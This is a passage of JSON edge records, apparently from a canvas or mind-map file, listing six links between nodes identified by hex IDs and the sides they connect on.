{"id":"5e0602bfcfe7c2d8","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"bd74d584cfd459a0","toSide":"left"},
{"id":"fdfdae8edf1d14d4","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"1b82ebdd45787434","toSide":"left"},
{"id":"fdd1495a1e42b325","fromNode":"1394a4460b5c048b","fromSide":"right","toNode":"e6fc699570842d2b","toSide":"left"},
{"id":"99668cc020cd3b42","fromNode":"e6fc699570842d2b","fromSide":"right","toNode":"524718ecdc2c84c8","toSide":"left"},
{"id":"a33d7dc09b726c17","fromNode":"1b82ebdd45787434","fromSide":"right","toNode":"6536b70581b33332","toSide":"left"},
{"id":"6d2f5a0c2b91c102","fromNode":"bd74d584cfd459a0","fromSide":"right","toNode":"158b16fd4dd21d5a","toSide":"left"},